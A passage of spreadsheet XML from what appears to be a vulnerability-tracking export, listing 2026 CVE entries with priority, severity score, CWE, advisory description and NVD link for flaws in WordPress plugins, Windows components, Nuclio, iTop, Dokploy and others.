      <c r="M1931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87958</t>
        </is>
      </c>
    </row>
    <row r="1932">
      <c r="A1932" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14873</t>
        </is>
      </c>
      <c r="C1932" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1932" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1932" s="5" t="inlineStr"/>
      <c r="F1932" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1932" s="5" t="inlineStr"/>
      <c r="H1932" s="5" t="inlineStr"/>
      <c r="I1932" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1932" s="5" t="inlineStr"/>
      <c r="K1932" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1932" s="5" t="inlineStr">
        <is>
          <t>The Bulk Password Reset plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.3.3. This is due to the plugin not properly validating a user's identity prior to updating their details like arbitrary user passwords, including administrator passwords, to a known plugin-configured custom value, enabling full account takeover of the site. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.</t>
        </is>
      </c>
      <c r="M1932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14873</t>
        </is>
      </c>
    </row>
    <row r="1933">
      <c r="A1933" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15581</t>
        </is>
      </c>
      <c r="C1933" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1933" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1933" s="5" t="inlineStr"/>
      <c r="F1933" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1933" s="5" t="inlineStr"/>
      <c r="H1933" s="5" t="inlineStr"/>
      <c r="I1933" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1933" s="5" t="inlineStr"/>
      <c r="K1933" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1933" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the TrustyAI Service (TAS) deployment. This vulnerability allows any pod on the cluster network to bypass authentication and directly access the TAS backend API. An attacker can exploit this to read, tamper with, or delete monitoring data and configurations, and inject arbitrary data into the service, potentially disrupting tenant operations.</t>
        </is>
      </c>
      <c r="M1933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15581</t>
        </is>
      </c>
    </row>
    <row r="1934">
      <c r="A1934" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28662</t>
        </is>
      </c>
      <c r="C1934" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1934" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1934" s="5" t="inlineStr"/>
      <c r="F1934" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1934" s="5" t="inlineStr"/>
      <c r="H1934" s="5" t="inlineStr"/>
      <c r="I1934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1934" s="5" t="inlineStr"/>
      <c r="K1934" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L1934" s="5" t="inlineStr">
        <is>
          <t>In p2p_process_prov_disc_bootstrap_req of p2p_pd.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28662</t>
        </is>
      </c>
    </row>
    <row r="1935">
      <c r="A1935" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30826</t>
        </is>
      </c>
      <c r="C1935" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1935" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1935" s="5" t="inlineStr"/>
      <c r="F1935" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1935" s="5" t="inlineStr"/>
      <c r="H1935" s="5" t="inlineStr"/>
      <c r="I1935" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1935" s="5" t="inlineStr"/>
      <c r="K1935" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1935" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the testing OQL query functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30826</t>
        </is>
      </c>
    </row>
    <row r="1936">
      <c r="A1936" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30890</t>
        </is>
      </c>
      <c r="C1936" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1936" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1936" s="5" t="inlineStr"/>
      <c r="F1936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1936" s="5" t="inlineStr"/>
      <c r="H1936" s="5" t="inlineStr"/>
      <c r="I1936" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1936" s="5" t="inlineStr"/>
      <c r="K1936" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1936" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the synchro import script. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30890</t>
        </is>
      </c>
    </row>
    <row r="1937">
      <c r="A1937" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31803</t>
        </is>
      </c>
      <c r="C1937" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1937" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1937" s="5" t="inlineStr"/>
      <c r="F1937" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1937" s="5" t="inlineStr"/>
      <c r="H1937" s="5" t="inlineStr"/>
      <c r="I1937" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1937" s="5" t="inlineStr"/>
      <c r="K1937" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1937" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in pages/tagadmin.php. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31803</t>
        </is>
      </c>
    </row>
    <row r="1938">
      <c r="A1938" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31880</t>
        </is>
      </c>
      <c r="C1938" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1938" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1938" s="5" t="inlineStr"/>
      <c r="F1938" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1938" s="5" t="inlineStr"/>
      <c r="H1938" s="5" t="inlineStr"/>
      <c r="I1938" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1938" s="5" t="inlineStr"/>
      <c r="K1938" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1938" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the universal search. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31880</t>
        </is>
      </c>
    </row>
    <row r="1939">
      <c r="A1939" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42807</t>
        </is>
      </c>
      <c r="C1939" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1939" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1939" s="5" t="inlineStr"/>
      <c r="F1939" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1939" s="5" t="inlineStr"/>
      <c r="H1939" s="5" t="inlineStr"/>
      <c r="I1939" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1939" s="5" t="inlineStr"/>
      <c r="K1939" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1939" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability in the PC bridge protocol decoder of BoschSensortec COINES_SDK (versions 2.10 through 2.12.2) allows attackers to cause a denial of service (process crash) or potentially execute arbitrary code. 
The bridge decoder ({{bridge_decoder.c}}) trusts the packet length field provided by the external device and forwards it to the host response queue ({{mqueue_add_data}}) without validating the bounds of the destination buffer. 
A malicious or compromised USB or Bluetooth Low Energy (BLE) peripheral can advertise a payload size up to ~3 KB, which exceeds the default queue slot size of 255 bytes. 
This results in an unbounded heap overwrite ({{memcpy}}), corrupting adjacent heap metadata on the host system when processing the device's response.</t>
        </is>
      </c>
      <c r="M1939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42807</t>
        </is>
      </c>
    </row>
    <row r="1940">
      <c r="A1940" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45790</t>
        </is>
      </c>
      <c r="C1940" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1940" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1940" s="5" t="inlineStr"/>
      <c r="F1940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1940" s="5" t="inlineStr"/>
      <c r="H1940" s="5" t="inlineStr"/>
      <c r="I1940" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1940" s="5" t="inlineStr"/>
      <c r="K1940" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1940" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.6, Dokploy's organization.inviteMember tRPC procedure in apps/dokploy/server/api/routers/organization.ts allows a user with member:create permission to invite an account with the owner role, while packages/server/src/services/user.ts allows a privileged self-hosted user to create an account with an arbitrary role, enabling permanent organization takeover because owner roles cannot be demoted. This issue is fixed in version 0.29.6.</t>
        </is>
      </c>
      <c r="M1940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45790</t>
        </is>
      </c>
    </row>
    <row r="1941">
      <c r="A1941" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47858</t>
        </is>
      </c>
      <c r="C1941" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1941" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1941" s="5" t="inlineStr"/>
      <c r="F1941" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1941" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H1941" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_tools</t>
        </is>
      </c>
      <c r="I1941" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1941" s="5" t="inlineStr"/>
      <c r="K1941" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1941" s="5" t="inlineStr">
        <is>
          <t>Starting Spring Boot applications in the Spring Tools with the live information mode enabled makes the running application vulnerable against JMX-based remote code execution.
Affected Spring Products and Versions:
Spring Tools for Eclipse: 5.2.0 and earlier
Spring Tools for VSCode / Cursor / Theia: 2.2.0 and earlier</t>
        </is>
      </c>
      <c r="M1941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47858</t>
        </is>
      </c>
    </row>
    <row r="1942">
      <c r="A1942" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48080</t>
        </is>
      </c>
      <c r="C1942" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1942" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1942" s="5" t="inlineStr"/>
      <c r="F1942" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1942" s="5" t="inlineStr">
        <is>
          <t>docker, postgresql</t>
        </is>
      </c>
      <c r="H1942" s="5" t="inlineStr"/>
      <c r="I1942" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1942" s="5" t="inlineStr"/>
      <c r="K1942" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1942" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, the `GET /api/tenants/{id}` endpoint returns the full tenant record to any authenticated `TENANT_ADMIN` of that tenant, including the `databaseUrl` field. This field contains the live PostgreSQL connection string the application uses to connect to that tenant's database. In the tested official `docker-compose.prod.yml` deployment, the connection string contained the user `postgres` with `rolsuper=true` and the plaintext password from `secrets/postgres_password.txt`. Operators who configure a non-superuser PostgreSQL user via `secrets/postgres_user.txt` would expose a less privileged credential, but the disclosure of the connection string itself is independent of that choice. The same credential applies to every database managed by that PostgreSQL instance: the central `appointment_booking` database, every per-tenant database (one per tenant), and the postgres administrative database. A `TENANT_ADMIN` of one tenant who can reach `postgres:5432` (directly via internal network, indirectly via any SSRF, RCE, or file-read in the application) can read every other tenant's appointment ciphertexts, key shares, and metadata; read the central user table, including all `GLOBAL_ADMIN` accounts, password hashes, and session records; modify or delete any data in any tenant database; and/or i a superuser-scoped deployment: use PostgreSQL's `pg_read_server_files`, `COPY ... FROM PROGRAM`, and `CREATE EXTENSION` for further escalation inside the database container. This breaks the per-tenant database isolation that is otherwise the primary cross-tenant control in the application. The application code carefully scopes most queries to the calling tenant's database, but those scopings are irrelevant once the attacker holds the credentials that bypass the application entirely. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M1942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48080</t>
        </is>
      </c>
    </row>
    <row r="1943">
      <c r="A1943" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49832</t>
        </is>
      </c>
      <c r="C1943" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1943" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1943" s="5" t="inlineStr"/>
      <c r="F1943" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1943" s="5" t="inlineStr"/>
      <c r="H1943" s="5" t="inlineStr"/>
      <c r="I1943" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1943" s="5" t="inlineStr"/>
      <c r="K1943" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1943" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. From versions 8.0-rc1 to before 8.4, versions 9.0-rc1 to before 9.3, and version 10-rc1, Remote Code Execution (RCE) is possible via Velocity Templates used by DSpace for COAR Notify/LDN messages. This issue has been patched in versions 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="M1943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49832</t>
        </is>
      </c>
    </row>
    <row r="1944">
      <c r="A1944" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52831</t>
        </is>
      </c>
      <c r="C1944" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1944" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1944" s="5" t="inlineStr"/>
      <c r="F1944" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1944" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1944" s="5" t="inlineStr"/>
      <c r="I1944" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1944" s="5" t="inlineStr"/>
      <c r="K1944" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1944" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.4, the Nuclio controller builds a curl invocation string for each cron trigger and stores it as the args of a Kubernetes CronJob container (/bin/sh, -c, &lt;command&gt;). Two fields in the trigger specification flow into this string without adequate sanitization: event.headers keys and event.body. This issue has been patched in version 1.16.4.</t>
        </is>
      </c>
      <c r="M1944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52831</t>
        </is>
      </c>
    </row>
    <row r="1945">
      <c r="A1945" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52833</t>
        </is>
      </c>
      <c r="C1945" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1945" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1945" s="5" t="inlineStr"/>
      <c r="F1945" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1945" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1945" s="5" t="inlineStr"/>
      <c r="I1945" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1945" s="5" t="inlineStr"/>
      <c r="K1945" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1945" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.5, Nuclio's Java runtime generates a build.gradle file during function builds using Go's text/template package. The template renders runtimeAttributes.repositories[] values with the {{ . }} action, which performs no escaping. An attacker can embed a closing brace (}) to break out of the repositories {} block and append arbitrary Groovy statements that execute unconditionally during the Gradle configuration phase. This issue has been patched in version 1.16.5.</t>
        </is>
      </c>
      <c r="M1945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52833</t>
        </is>
      </c>
    </row>
    <row r="1946">
      <c r="A1946" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53932</t>
        </is>
      </c>
      <c r="C1946" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1946" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1946" s="5" t="inlineStr"/>
      <c r="F1946" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1946" s="5" t="inlineStr"/>
      <c r="H1946" s="5" t="inlineStr"/>
      <c r="I1946" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1946" s="5" t="inlineStr"/>
      <c r="K1946" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L1946" s="5" t="inlineStr">
        <is>
          <t>laravel-backup-restore restores database backups made with spatie/laravel-backup. Prior to version 1.9.4, a crafted backup archive can trigger OS command injection during database restore. This issue has been patched in version 1.9.4.</t>
        </is>
      </c>
      <c r="M1946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53932</t>
        </is>
      </c>
    </row>
    <row r="1947">
      <c r="A1947" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55277</t>
        </is>
      </c>
      <c r="C1947" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1947" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1947" s="5" t="inlineStr"/>
      <c r="F1947" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1947" s="5" t="inlineStr"/>
      <c r="H1947" s="5" t="inlineStr"/>
      <c r="I1947" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1947" s="5" t="inlineStr"/>
      <c r="K1947" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L1947" s="5" t="inlineStr">
        <is>
          <t>In checkUiccListenConfigNeeded of RoutingManager.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55277</t>
        </is>
      </c>
    </row>
    <row r="1948">
      <c r="A1948" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68827</t>
        </is>
      </c>
      <c r="C1948" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1948" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1948" s="5" t="inlineStr"/>
      <c r="F1948" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1948" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1948" s="5" t="inlineStr"/>
      <c r="I1948" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1948" s="5" t="inlineStr"/>
      <c r="K1948" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L1948" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t>
        </is>
      </c>
    </row>
    <row r="1949">
      <c r="A1949" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68834</t>
        </is>
      </c>
      <c r="C1949" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1949" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1949" s="5" t="inlineStr"/>
      <c r="F1949" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1949" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1949" s="5" t="inlineStr"/>
      <c r="I1949" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1949" s="5" t="inlineStr"/>
      <c r="K1949" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1949" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t>
        </is>
      </c>
    </row>
    <row r="1950">
      <c r="A1950" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68838</t>
        </is>
      </c>
      <c r="C1950" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1950" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1950" s="5" t="inlineStr"/>
      <c r="F1950" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1950" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1950" s="5" t="inlineStr"/>
      <c r="I1950" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1950" s="5" t="inlineStr"/>
      <c r="K1950" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1950" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t>
        </is>
      </c>
    </row>
    <row r="1951">
      <c r="A1951" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68876</t>
        </is>
      </c>
      <c r="C1951" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1951" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1951" s="5" t="inlineStr"/>
      <c r="F1951" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1951" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1951" s="5" t="inlineStr"/>
      <c r="I1951" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1951" s="5" t="inlineStr"/>
      <c r="K1951" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1951" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t>
        </is>
      </c>
    </row>
    <row r="1952">
      <c r="A1952" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68878</t>
        </is>
      </c>
      <c r="C1952" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1952" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1952" s="5" t="inlineStr"/>
      <c r="F1952" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1952" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1952" s="5" t="inlineStr"/>
      <c r="I1952" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1952" s="5" t="inlineStr"/>
      <c r="K1952" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1952" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t>
        </is>
      </c>
    </row>
    <row r="1953">
      <c r="A1953" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68880</t>
        </is>
      </c>
      <c r="C1953" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1953" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1953" s="5" t="inlineStr"/>
      <c r="F1953" s="5" t="n">
        <v>0.004</v>
